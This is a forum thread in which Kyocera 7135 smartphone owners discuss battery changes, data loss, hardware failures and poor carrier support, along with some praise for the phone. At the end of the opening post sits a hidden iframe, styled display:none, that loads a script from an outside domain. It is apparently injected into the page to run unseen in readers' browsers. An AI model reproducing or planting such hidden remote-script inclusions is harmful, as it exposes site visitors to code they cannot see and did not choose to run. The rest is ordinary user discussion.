+ Reply to Thread

Is this phone junk?

Hi. Ihave a 7135 smart phone and was wondering if anyone else has battery connection problems? My phone is only one month old and now has to be shipped back to kyocera for repair. I found out on another site of reviews that others also are having the same problem. I have also read that kyocera service isn't real good. I guess I get to be one of the dumb phone testers. And did I mention you have only 15 seconds to change a battery or lose all of your info. This was told to me by the service tech. Told me to plug in the power supply when changing the battery. Makes sence but what about when you are on the road? Now you need to cary the supply when going places? I would like my money back but after you buy it its yours so have fun and beware. NO REFUNDS JUST ONE YEAR GURANTEE.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Is this phone junk?

Originally posted by "impalass"

...And did I mention you have only 15 seconds to change a battery or lose all of your info. This was told to me by the service tech. Told me to plug in the power supply when changing the battery. Makes sence but what about when you are on the road? Now you need to cary the supply when going places? ...
    According to the 7135 reference manual the internal battery should store information for 45 seconds while changing a battery. It's still not a long time but better than 15 seconds.

How long do you guys need to change the battery???

15 seconds is a LONG time for this task. Even if you fumble the battery it shouldnt take you any longer than 8 seconds. Go ahead and watch the clock and wait for 15 seconds to pass. But they gave you 45 so you should have more than enough time.

Just remember... HAVE the new battery ready to go.

Editor and Site Administrator Convergent's Avatar
    What do they mean by "lose everything"? On the i700 you have about the same time. But you don't lose everything, you just end up restarting the device. Do you truly lose everything? Cold start time?
    Mike - Been Converged?

I'm confused the User's Guide ( pg 64 ) on the Kyocera website states:

"A built-in backup battery maintains the clock settings and data for an additional 45 minutes after the residual energy in the battery is depleted or if the battery is removed. Use this time to replace the drained battery with a charged one."

Not an owner yet, I am one of ( sounds like many ) those on the fence between this and the I700, am I reading this wrong

Re: Is this phone junk?

Originally posted by "impalass"

This was told to me by the service tech.
    I think this is the problem...
    Dont always trust what techs tell you.

Is this phone Junk?

I've had my phone about 2 months, I use it in my work and love it. Now my wife and kids have discovered some of the games I've installed and I have to take it away from them. My only complaint is the battery doesn't last long enough. Gotta charge it every day, sometimes twice.

Pulled the battery after it exception'ed and lost all data...
    SD backup got me to that morning.
    Battery was out no more than 30 seconds.
    Just my usage experience, hope it helps.

-Will

While on vacation last weekend I replaced my low battery (not dead, at one bar) with a fresh battery. It took me 4 seconds at most, but then it would not turn on. Tried the reset button, still not on, pulled the battery, put it back in, still would not turn on. When it finally did come on, it was like new! Sure I could make phone calls but ALL my data was gone. When I got back home I synced up and all was back to normal. I went out and got the backup SD card for the next vacation because I cant afford not to have my contact data. I figured it might be a fluke but will have to see if it happens again. Just my experience and I still love this phone.
    Chris

Unhappy Yes this phone IS junk

My group bought 5 of these phones. So far ALL have failed. One of them was up for 3 weeks, then failed (locked up). Sent back for repair - gon FOUR weeks. Got it back - it lasted 2 hours then failed again. Gon for three weeks now.

All other phones have failed. One wlost headset output, one has intmt microphone, 2 get endless "fatal error" messages.

Often need to "reset" and sometimes lose all appts, address book. Anything not backed up is gone.

Distributer (Bell World / Bell Canada) says no refunde, no loaners, no luck.

This phone is a total rip-off - don't buy it.

Thumbs down Another one bites the dust

In the last few minutes another 7135 has bitten the dust. This one refuses to accept a charge from the cradle or from the car-adapter.

That means you have to remove the battery every night to charge it, then install it in the AM.

Enroute in the car it just drains, and after a couple of hours it's dead. Oh, by the way, this also means you need to re-synch every day, because with the batt removed all night (to charge it) the phone looses it's marbles.

So the routine is: re-synch at night, remove batt to charge, insert batt in AM, turn on desktop computer, re-synch again, drive around.... make appointments on paper because you won't make it through the day... then enter appts and phone numbers on desktop for tomorrow morning's re-synch.

Do not buy one of these phones. There is no support, no help, no recourse. Bell Mobility says all I can do is sue them. Great support

I Love 7135

No offense, but I love my 7135....I have had few problems, those I did have could be fixed with 5 minutes of trying a few things...IMO this is the best CDMA smartphone out there, nothing else can really compare...

I agree with mmueller07, the 7135 is not perfect, my 6035 had better reception, but it is a great phone.

In testing last night, when I switched batteries, I had it plugged into the wall and although I turned off the phone receiver before I did it, the phone did not so much as flicker during the change. So if you have the option, it seems like the way to go.

Bob, you might be on to something by the way, you say your mobile service is with Bell Mobility. It may be that when they customized the phone for their networks they messed them up. They certainly don't sound like they deserve further patronage. My carrier is Verizon (and I realize you don't have this option, but), who gives 15 days to return with no penalty, and I added the insurance so lost, stolen or smashed, I get a new (referb) unit. Demand more from your service provider or find a new service.

Chris